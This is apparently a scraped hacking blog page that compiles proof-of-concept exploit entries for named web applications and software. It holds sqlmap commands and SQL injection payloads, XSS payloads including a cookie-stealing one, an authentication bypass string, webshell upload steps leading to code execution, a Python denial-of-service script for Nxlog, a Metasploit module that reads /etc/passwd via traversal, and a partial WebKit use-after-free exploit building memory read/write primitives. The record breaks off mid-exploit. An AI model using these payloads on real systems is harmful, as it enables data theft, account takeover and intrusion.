# Exploit Title: Medical Center Portal Management System 1.0 - 'id' SQL Injection
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-10
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14594/medical-center-portal-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14594&title=Medical+Center+Portal+Management+System+using+PHP%2FMySQLi
# Affected Version: Version 1
# Patched Version: Unpatched
# Category: Web Application
# Tested on: Parrot OS
Step 1. Login to the application with any verified user credentials
Step 2. Select Staff and select the view icon.
Step 3. You will be redirected to a page like "
http://localhost/pages/emp_searchfrm.php?action=edit & id=1". Or visit any
page that has the "id" parameter. Capture the current page request in
burpsuite
Step 4. Save request and run sqlmap on request file using command " sqlmap
-r request -p id --time-sec=5 --dbs ".
Step 5. This will inject successfully and you will have an information
disclosure of all databases contents.
---
Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: action=edit & id=(SELECT (CASE WHEN (7289=7289) THEN 22 ELSE
(SELECT 4035 UNION SELECT 6415) END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
Payload: action=edit & id=22 AND (SELECT 9743 FROM(SELECT
COUNT(*),CONCAT(0x716b6a7871,(SELECT
(ELT(9743=9743,1))),0x71706b7071,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: action=edit & id=22 AND (SELECT 4861 FROM
(SELECT(SLEEP(5)))xiXm)
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: action=edit & id=22 UNION ALL SELECT
NULL,NULL,NULL,NULL,CONCAT(0x716b6a7871,0x4b445769664f765073644975666f6e50615968654f6b626259447767746c67516949686365597672,0x71706b7071),NULL,NULL,NULL,NULL--
-
---
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863143345
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Customer Support System 1.0 - 'id' SQL Injection
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-11
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Patched Version: Unpatched
# Category: Web Application
# Tested on: Parrot OS
Step 1. Login to the application with admin credentials
Step 2. Click on Customer and select list.
Step 3. On Customer list page, click on action and select edit. Capture the request made to "http://localhost/index.php?page=edit_customer&id=2" in burpsuite
Step 4. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs ".
Step 5. This will inject successfully and you will have an information disclosure of all databases contents.
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=edit_staff&id=1 AND 4164=4164
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=edit_staff&id=1 AND (SELECT 9430 FROM (SELECT(SLEEP(5)))HIyV)
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: page=edit_staff&id=-8018 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a716a71,0x497a58666d50656449704b4d76784f43577748416175666f44685869774177416f454c546458536d,0x717a7a6a71),NULL,NULL,NULL,NULL,NULL-- -
---
# Exploit Title: Customer Support System 1.0 - "First Name" & "Last Name" Stored XSS
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-11
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Tested on: Parrot OS
Step 1. Login to the application with any valid credentials
Step 2. Click on the username in header and select "Manage Account".
Step 3. On "Manage Account" page, insert "<script>alert("r0b0tG4nG")</script>" in both the "First Name" & "Last Name" fields.
Step 4. Complete the other required details and click on save to update user information.
Step 5. This should trigger the XSS payloads. Whenever the user logs in with same valid credentials, the XSS payloads will be triggered
# Exploit Title: Interview Management System 1.0 - Stored XSS in Add New Question
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-09
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14585/interview-management-system-phpmysqli-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14585&title=Interview+Management+System+in+PHP%2FMySQLi+with+Full+Source+Codee
# Affected Version: Version 1
# Patched Version: Unpatched
# Category: Web Application
# Tested on: Parrot OS
Step 1: Log in to the application with any valid user credentials.
Step 2: Click on Add New Question Page.
Step 3: input "<script>alert(document.cookie)</script>" in the new question
field and select add new question.
Step 4: Once you have an XSS payload as a question in add new question
page, click on View Questions Page.
Step 5: This will trigger the XSS payload.
# Exploit Title: Online Tours & Travels Management System 1.0 - "id" SQL Injection
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-11
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14510&title=Online+Tours+%26+Travels+management+system+project+using+PHP+and+MySQL
# Affected Version: Version 1
# Patched Version: Unpatched
# Category: Web Application
# Tested on: Parrot OS
Step 1. Login to the application with admin credentials
Step 2. Click on "Bookings" in header and select "Add Bookings".
Step 3. Complete the required details and click on "Save" to save the new Bookings.
Step 4. On the "Bookings" page, find your new booking/existing booking and click on the edit icon.
Step 5. You will be redirected to a page like "http://localhost/admin/update_booking.php?id=1". Or visit any page that has the "id" parameter. Capture the current page request in burpsuite.
Step 6. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs ".
Step 7. This will inject successfully and you will have an information disclosure of all databases contents.
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=2' RLIKE (SELECT (CASE WHEN (4085=4085) THEN 2 ELSE 0x28 END))-- rKrg
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=2' AND (SELECT 7113 FROM(SELECT
COUNT(*),CONCAT(0x716a626a71,(SELECT
(ELT(7113=7113,1))),0x71766b6a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tGzP
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: id=2';SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=2' AND (SELECT 8504 FROM (SELECT(SLEEP(5)))sMoK)-- IXQq
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: id=-1072' UNION ALL SELECT
NULL,CONCAT(0x716a626a71,0x664b4d6f72794f69657a6c5a4e415a434b70547951435077694b66505a7572574d73704b54524b72,0x71766b6a71),NULL,NULL#
---
# Exploit Title: Interview Management System 1.0 - 'id' SQL Injection
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-10
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14585/interview-management-system-phpmysqli-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14585&title=Interview+Management+System+in+PHP%2FMySQLi+with+Full+Source+Code
# Affected Version: Version 1
# Patched Version: Unpatched
# Category: Web Application
# Tested on: Parrot OS
Step 1. Login to the application with any verified user credentials
Step 2. Click on View Candidates page and select take exam. If there is no
candidate, click on "Add New Candidate" page, fill details and add new
candidate.
Step 3. Click on "Take Exam" and capture the request in burpsuite.
Step 4. Save request and run sqlmap on request file using command " sqlmap
-r request -p id --time-sec=5 --dbs ".
Step 5. This will inject successfully and you will have an information
disclosure of all databases contents.
---
Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (7913=7913) THEN 1 ELSE (SELECT 5980
UNION SELECT 3372) END))
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: id=1;SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 6708 FROM (SELECT(SLEEP(5)))QTiW)
---
# Exploit Title: Nxlog Community Edition 2.10.2150 - DoS (Poc)
# Date: 15/12/2020
# Exploit Author: Guillaume PETIT
# Vendor Homepage: https://nxlog.co
# Software Link: https://nxlog.co/products/nxlog-community-edition/download
# Version: 2.10.2150
# Tested on: Linux Debian 10 && Windows Server 2019
# CVE: CVE-2020-35488
#!/usr/bin/python3
import sys
import time
import argparse
from scapy.all import *
def getPayload(args):
# IF UNIX
if (args.OS == 1):
return "Sep 14 14:09:09 .. dhcp service[warning] 110 Silence is golden"
# IF WINDOWS
elif (args.OS == 2):
return "Sep 14 14:09:09 CON dhcp service[warning] 110 Silence is golden"
# Test
elif (args.OS == 3):
return "Sep 14 14:09:09 123soleil dhcp service[warning] 110 Silence is golden"
def runExploit(args,payload):
priority = 30
message = payload
syslog = IP(src="192.168.1.10",dst=args.IP)/UDP(sport=666,dport=args.PORT)/Raw(load="<" + str(priority) + ">" + message)
send(syslog,verbose=args.DEBUG)
def getArguments():
parser = argparse.ArgumentParser(description="Go h@ck SYSLOG")
parser.add_argument("-ip", "-IP", dest="IP", type=str, metavar="IP destination", required=True,default=1, help="IP of NXLOG server")
parser.add_argument("-p", "-P", dest="PORT", type=int, metavar="Port destination", required=False,default=514, help="Port of NXLOG default 514")
parser.add_argument("-os", "-OS", dest="OS", type=int, metavar="OS", default=1, required=True, help="1 : For unix payload \n 2 : For Windows Paylaod \n 3 : Just for test")
parser.add_argument("-d", "-D", dest="DEBUG", type=int, metavar="DEBUG", default=0, required=False, help="1 : Debbug enable")
return parser.parse_args()
def main():
args = getArguments()
payload = getPayload(args)
runExploit(args,payload)
main()
# Exploit Title: Victor CMS 1.0 - Multiple SQL Injection (Authenticated)
# Date: 17.12.2020
# Exploit Author: Furkan Göksel
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Version: 1.0
# Description: The Victor CMS v1.0 application is vulnerable to SQL
# injection in c_id parameter of admin_edit_comment.php, p_id parameter
# of admin_edit_post.php, u_id parameter of admin_edit_user.php, edit
# parameter of admin_update_categories.php.
# Tested on: Apache2/Linux
Step 1: Register the system through main page and login your account
Step 2: After successful login, select one of the specified tabs
(post, categories, comments, users)
Step 3: When you click edit button of these records, an HTTP request
is sent to server to get details of this record with corresponding
parameters (eg. for edit comment it is c_id parameter)
Step 4: Inject your SQL payload to these ids or use sqlmap to dump
Example PoC request is as follows:
GET /cve/admin/comment.php?source=edit_comment&c_id=2%20AND%20SLEEP(10) HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0)
Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=st8hhobgplut500p3lpug8qa66
Upgrade-Insecure-Requests: 1
Same PoC payload is valid for all edit features of specified tabs.
# Exploit Title: PHPJabbers Appointment Scheduler 2.3 - Reflected XSS (Cross-Site Scripting)
# Date: 2020-12-14
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://www.phpjabbers.com
# Software Link: https://www.phpjabbers.com/appointment-scheduler
# Version: 2.3
# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 83.0, Microsoft Edge 87.0.664.60)
# CVE: CVE-2020-35416
Reflected Cross-Site Scripting (XSS) vulnerability in 'index.php' login-portal webpage of Stivasoft/PHPJabbers Appointment Scheduler v2.3 (and many others, in example from "ilmiogestionale.eu", since some companies/web agencies did a script rebrand/rework) allows remote attacker to inject arbitrary script or HTML.
Request parameters affected: "date", "action", arbitrarily supplied URL parameters, possible others.
PoC Request:
GET /index.php?controller=pjFrontPublic&action=pjActionServices&cid=1&layout=1&date=%3cscript%3ealert(1)%3c%2fscript%3e&theme=theme9 HTTP/1.1
Host: [removed]
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
X-Requested-With: XMLHttpRequest
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://[removed]
Accept-Encoding: gzip, deflate
Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: _ga=GA1.2.505990147.1607596638; _gid=GA1.2.1747301294.1607596638; AppointmentScheduler=5630ae3ab2ed56dbe79c033b84565422
PoC Response:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 14 Dec 2020 10:48:41 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Access-Control-Allow-Methods: POST, GET, OPTIONS
Access-Control-Allow-Headers: Origin, X-Requested-With
Content-Length: 13988
<div class="container-fluid">
<div class="row">
<div class="col-lg-4 col-md-4 col-sm-4 col-xs-12">
<div class="panel panel-default pjAsContainer pjAsAside">
<div class="panel-heading p
...[SNIP]...
<div class="pj-calendar-ym">Dicembre, <script>alert(1)</script></div>
...[SNIP]...
# Exploit Title: Employee Record System 1.0 - Multiple Stored XSS
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-09
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14588/employee-record-system-phpmysqli-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14588&title=Employee+Record+System+in+PHP%2FMySQLi+with+Full+Source+Code
# Affected Version: Version 1
# Patched Version: Unpatched
# Category: Web Application
# Tested on: Parrot OS
Step 1: Log in to the application with any valid user credentials.
Step 2: Click on Add Employee.
Step 3: input "<script>alert(1)</script>" in all fields except phone number
fields. Note: increase the values of "1" in "alert(1)" to determine which
field is vulnerable. Eg <script>alert(2)</script>,
<script>alert(3)</script> ....etc.
Step 4: Once all fields are completed, Click on ADD RECORD to save the
record.
Step 5: Click on All Employees page and this will trigger the Stored XSS.
Step 6: To view all Stored XSS, after clicking on All Employees page, click
on the View Employee Icon. This will tigger all Stored XSS payloads.
# Exploit Title: Alumni Management System 1.0 - Unrestricted File Upload To RCE
# Exploit Author: Aakash Madaan
# Date: 2020-12-17
# Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14524&title=Alumni+Management+System+using+PHP%2FMySQL+with+Source+Code
# Affected Version: Version 1
# Tested on: Parrot OS
Step 1. Login to the application with admin credentials
Step 2. Click on "System Settings" page.
Step 3. At the image upload field, browse and select any php webshell.
Click on upload to upload the php webshell.
Step 4. Visit "http://localhost/admin/assets/uploads/" and select your
upload phpwebshell.
Step 5. You should have a remote code execution.
# Exploit Title: Point of Sale System 1.0 - Authentication Bypass
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-17
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/9620/point-sale-system-pos.html
# Software Link: https://www.sourcecodester.com/download-code?nid=9620&title=Point+of+Sale+System+%28POS%29+using+PHP+with+Source+Code
# Affected Version: Version 1
# Patched Version: Unpatched
# Category: Web Application
# Tested on: Parrot OS
# Description: Easy authentication bypass vulnerability on the application allows an attacker to log in as Administrator.
Step 1: On the login page, simply use { ' or 0=0 # } as username
Step 2: On the login page, use same query{ ' or 0=0 # } as password
All set you should be logged in as Administrator.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress Duplicator File Read Vulnerability',
'Description' => %q{ This module exploits an unauthenticated directory traversal vulnerability in WordPress plugin 'Duplicator' plugin version 1.3.24-1.3.26, allowing arbitrary file read with the web server privileges. This vulnerability was being actively exploited when it was discovered.},
'References' =>
[
['CVE', '2020-11738'],
['WPVDB', '10078'],
['URL', 'https://snapcreek.com/duplicator/docs/changelog']
],
'Author' =>
[
'Ramuel Gall', # Vulnerability discovery
'Hoa Nguyen - SunCSR Team' # Metasploit module
],
'DisclosureDate' => 'Feb 19 2020',
'License' => MSF_LICENSE
))
register_options(
[
OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 5])
])
end
def check
check_plugin_version_from_readme('duplicator_download','1.3.27', '1.3.24')
end
def run_host(ip)
traversal = '../' * datastore['DEPTH']
filename = datastore['FILEPATH']
filename = filename[1, filename.length] if filename =~ /^\//
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'wp-admin', 'admin-ajax.php'),
'vars_get' =>
{
'action' => 'duplicator_download',
'file' => "#{traversal}#{filename}"
}
})
fail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, 'Connection failed. Nothingn was downloaded' if res.code != 200
fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?
print_status('Downloading file...')
print_line("\n#{res.body}\n")
fname = datastore['FILEPATH']
path = store_loot(
'duplicator.traversal',
'text/plain',
ip,
res.body,
fname
)
print_good("File saved in: #{path}")
end
end
# Exploit Title: Alumni Management System 1.0 - 'id' SQL Injection
# Exploit Author: Aakash Madaan
# Date: 2020-12-17
# Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14524&title=Alumni+Management+System+using+PHP%2FMySQL+with+Source+Code
# Affected Version: Version 1
# Tested on: Parrot OS
Step 1. Login to the application with admin credentials
Step 2. Click on "Events" page.
Step 3. Choose any event and select "view" or "edit". The url should be "
http://localhost/index.php?page=view_event&id=2" or "
http://localhost/admin/index.php?page=manage_event&id=1"
Step 4. Capture the request to the "view" or "edit" event page in burpsuite.
Step 5. Save the captured request and run sqlmap on it using "sqlmap -r
request --time-sec=5 --dbs
---
Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: page=edit_student&id=(SELECT (CASE WHEN (6191=6191) THEN 3
ELSE (SELECT 5620 UNION SELECT 3605) END))
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=edit_student&id=3 AND (SELECT 7847 FROM
(SELECT(SLEEP(5)))LQiE)
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: page=edit_student&id=-4840 UNION ALL SELECT
NULL,CONCAT(0x717a7a7171,0x7152494c444964626e63466c66734573495771697a566862414e6c6f786e6d54566c6549484f6967,0x71767a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
-
---
Step 6. Sqlmap should inject the web-app successfully which leads to
information disclosure
# Exploit Title: Alumni Management System 1.0 - "Course Form" Stored XSS
# Exploit Author: Aakash Madaan
# Date: 2020-12-10
# Vendor Homepage: https://www.sourcecodester.com/php/14524/alumni-management-system-using-phpmysql-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14524&title=Alumni+Management+System+using+PHP%2FMySQL+with+Source+Code
# Affected Version: Version 1
# Tested on: Parrot OS
Step 1. Login to the application with admin credentials
Step 2. Click on the "Course List" page.
Step 3. In the "Course Form" field, use XSS payload
"<script>alert("course")</script>" as the name of new course and click on
save.
Step 4. This should trigger the XSS payload and anytime you click on the
"Course List" page, your stored XSS payload will be triggered.
const OFFSET_ELEMENT_REFCOUNT = 0x10;
const OFFSET_JSAB_VIEW_VECTOR = 0x10;
const OFFSET_JSAB_VIEW_LENGTH = 0x18;
const OFFSET_LENGTH_STRINGIMPL = 0x04;
const OFFSET_HTMLELEMENT_REFCOUNT = 0x14;
const LENGTH_ARRAYBUFFER = 0x8;
const LENGTH_STRINGIMPL = 0x14;
const LENGTH_JSVIEW = 0x20;
const LENGTH_VALIDATION_MESSAGE = 0x30;
const LENGTH_TIMER = 0x48;
const LENGTH_HTMLTEXTAREA = 0xd8;
const SPRAY_ELEM_SIZE = 0x6000;
const SPRAY_STRINGIMPL = 0x1000;
const NB_FRAMES = 0xfa0;
const NB_REUSE = 0x8000;
var g_arr_ab_1 = [];
var g_arr_ab_2 = [];
var g_arr_ab_3 = [];
var g_frames = [];
var g_relative_read = null;
var g_relative_rw = null;
var g_ab_slave = null;
var g_ab_index = null;
var g_timer_leak = null;
var g_jsview_leak = null;
var g_message_heading_leak = null;
var g_message_body_leak = null;
var g_obj_str = {};
var g_rows1 = '1px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "1px";
var g_rows2 = '2px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "2px";
var g_round = 1;
var g_input = null;
var guess_htmltextarea_addr = new Int64("0x2070a00d8");
/* Executed after deleteBubbleTree */
function setupRW() {
/* Now the m_length of the JSArrayBufferView should be 0xffffff01 */
for (let i = 0; i < g_arr_ab_3.length; i++) {
if (g_arr_ab_3[i].length > 0xff) {
g_relative_rw = g_arr_ab_3[i];
debug_log("[+] Succesfully got a relative R/W");
break;
}
}
if (g_relative_rw === null)
die("[!] Failed to setup a relative R/W primitive");
debug_log("[+] Setting up arbitrary R/W");
/* Retrieving the ArrayBuffer address using the relative read */
let diff = g_jsview_leak.sub(g_timer_leak).low32() - LENGTH_STRINGIMPL + 1;
let ab_addr = new Int64(str2array(g_relative_read, 8, diff + OFFSET_JSAB_VIEW_VECTOR));
/* Does the next JSObject is a JSView? Otherwise we target the previous JSObject */
let ab_index = g_jsview_leak.sub(ab_addr).low32();
if (g_relative_rw[ab_index + LENGTH_JSVIEW + OFFSET_JSAB_VIEW_LENGTH] === LENGTH_ARRAYBUFFER)
g_ab_index = ab_index + LENGTH_JSVIEW;
else
g_ab_index = ab_index - LENGTH_JSVIEW;
/* Overding the length of one JSArrayBufferView with a known value */
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0x41;
/* Looking for the slave JSArrayBufferView */
for (let i = 0; i < g_arr_ab_3.length; i++) {
if (g_arr_ab_3[i].length === 0x41) {
g_ab_slave = g_arr_ab_3[i];
g_arr_ab_3 = null;
break;
}
}
if (g_ab_slave === null)
die("[!] Didn't found the slave JSArrayBufferView");
/* Extending the JSArrayBufferView length */
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0xff;
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 1] = 0xff;
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 2] = 0xff;
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 3] = 0xff;
debug_log("[+] Testing arbitrary R/W");
let saved_vtable = read64(guess_htmltextarea_addr);
write64(guess_htmltextarea_addr, new Int64("0x4141414141414141"));
if (!read64(guess_htmltextarea_addr).equals("0x4141414141414141"))
die("[!] Failed to setup arbitrary R/W primitive");
debug_log("[+] Succesfully got arbitrary R/W!");
/* Restore the overidden vtable pointer */
write64(guess_htmltextarea_addr, saved_vtable);
/* Cleanup memory */
cleanup();
/* Getting code execution */
/* ... */
}
function read(addr, length) {
for (let i = 0; i < 8; i++)
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i);
let arr = [];
for (let i = 0; i < length; i++)
arr.push(g_ab_slave[i]);
return arr;
}
function read64(addr) {
return new Int64(read(addr, 8));
}
function write(addr, data) {
for (let i = 0; i < 8; i++)
g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i);
for (let i = 0; i < data.length; i++)
g_ab_slave[i] = data[i];
}
function write64(addr, data) {
write(addr, data.bytes());
}
function cleanup() {
select1.remove();
select1 = null;
input1.remove();
input1 = null;
input2.remove();
input2 = null;
input3.remove();
input3 = null;
div1.remove();
div1 = null;
g_input = null;
g_rows1 = null;
g_rows2 = null;
g_frames = null;
}
/*
* Executed after buildBubbleTree
* and before deleteBubbleTree
*/
function confuseTargetObjRound2() {
if (findTargetObj() === false)
die("[!] Failed to reuse target obj.");
g_fake_validation_message[4] = g_jsview_leak.add(OFFSET_JSAB_VIEW_LENGTH + 5 - OFFSET_HTMLELEMENT_REFCOUNT).asDouble();
setTimeout(setupRW, 6000);
}
/* Executed after deleteBubbleTree */
function leakJSC() {
debug_log("[+] Looking for the smashed StringImpl...");
var arr_str = Object.getOwnPropertyNames(g_obj_str);
/* Looking for the smashed string */
for (let i = arr_str.length - 1; i > 0; i--) {
if (arr_str[i].length > 0xff) {
debug_log("[+] StringImpl corrupted successfully");
g_relative_read = arr_str[i];
g_obj_str = null;
break;
}
}
if (g_relative_read === null)
die("[!] Failed to setup a relative read primitive");
debug_log("[+] Got a relative read");
let ab = new ArrayBuffer(LENGTH_ARRAYBUFFER);
/* Spraying JSView */
let tmp = [];
for (let i = 0; i < 0x10000; i++) {
/* The last allocated are more likely to be allocated after our relative read */
if (i >= 0xfc00)
g_arr_ab_3.push(new Uint8Array(ab));
else
tmp.push(new Uint8Array(ab));
}
tmp = null;
/*
* Force JSC ref on FastMalloc Heap
* https://github.com/Cryptogenic/PS4-5.05-Kernel-Exploit/blob/master/expl.js#L151
*/
var props = [];
for (var i = 0; i < 0x400; i++) {
props.push({ value: 0x42424242 });
props.push({ value: g_arr_ab_3[i] });
}
/*
* /!\
* This part must avoid as much as possible fastMalloc allocation
* to avoid re-using the targeted object
* /!\
*/
/* Use relative read to find our JSC obj */
/* We want a JSView that is allocated after our relative read */
while (g_jsview_leak === null) {
Object.defineProperties({}, props);
for (let i = 0; i < 0x800000; i++) {
var v = undefined;
if (g_relative_read.charCodeAt(i) === 0x42 &&
g_relative_read.charCodeAt(i + 0x01) === 0x42 &&
g_relative_read.charCodeAt(i + 0x02) === 0x42 &&
g_relative_read.charCodeAt(i + 0x03) === 0x42) {
if (g_relative_read.charCodeAt(i + 0x08) === 0x00 &&
g_relative_read.charCodeAt(i + 0x0f) === 0x00 &&
g_relative_read.charCodeAt(i + 0x10) === 0x00 &&
g_relative_read.charCodeAt(i + 0x17) === 0x00 &&
g_relative_read.charCodeAt(i + 0x18) === 0x0e &&
g_relative_read.charCodeAt(i + 0x1f) === 0x00 &&
g_relative_read.charCodeAt(i + 0x28) === 0x00 &&
g_relative_read.charCodeAt(i + 0x2f) === 0x00 &&
g_relative_read.charCodeAt(i + 0x30) === 0x00 &&
g_relative_read.charCodeAt(i + 0x37) === 0x00 &&
g_relative_read.charCodeAt(i + 0x38) === 0x0e &&
g_relative_read.charCodeAt(i + 0x3f) === 0x00)
v = new Int64(str2array(g_relative_read, 8, i + 0x20));
else if (g_relative_read.charCodeAt(i + 0x10) === 0x42 &&
g_relative_read.charCodeAt(i + 0x11) === 0x42 &&
g_relative_read.charCodeAt(i + 0x12) === 0x42 &&
g_relative_read.charCodeAt(i + 0x13) === 0x42)
v = new Int64(str2array(g_relative_read, 8, i + 8));
}
if (v !== undefined && v.greater(g_timer_leak) && v.sub(g_timer_leak).hi32() === 0x0) {
g_jsview_leak = v;
props = null;
break;
}
}
}
/*
* /!\
* Critical part ended-up here
* /!\
*/
debug_log("[+] JSArrayBufferView: " + g_jsview_leak);
/* Run the exploit again */
prepareUAF();
}
/*
* Executed after buildBubbleTree
* and before deleteBubbleTree
*/
function confuseTargetObjRound1() {
/* Force allocation of StringImpl obj. beyond Timer address */
sprayStringImpl(SPRAY_STRINGIMPL, SPRAY_STRINGIMPL * 2);
/* Checking for leaked data */
if (findTargetObj() === false)
die("[!] Failed to reuse target obj.");
dumpTargetObj();
g_fake_validation_message[4] = g_timer_leak.add(LENGTH_TIMER * 8 + OFFSET_LENGTH_STRINGIMPL + 1 - OFFSET_ELEMENT_REFCOUNT).asDouble();
/*
* The timeout must be > 5s because deleteBubbleTree is scheduled to run in
* the next 5s
*/
setTimeout(leakJSC, 6000);
}
function handle2() {
/* focus elsewhere */
input2.focus();
}
function reuseTargetObj() {
/* Delete ValidationMessage instance */
document.body.appendChild(g_input);
/*
* Free ValidationMessage neighboors.
* SmallLine is freed -> SmallPage is cached
*/
for (let i = NB_FRAMES / 2 - 0x10; i < NB_FRAMES / 2 + 0x10; i++)
g_frames[i].setAttribute("rows", ',');
/* Get back target object */
for (let i = 0; i < NB_REUSE; i++) {
let ab = new ArrayBuffer(LENGTH_VALIDATION_MESSAGE);
let view = new Float64Array(ab);
view[0] = guess_htmltextarea_addr.asDouble(); // m_element
view[3] = guess_htmltextarea_addr.asDouble(); // m_bubble
g_arr_ab_1.push(view);
}
if (g_round == 1) {
/*
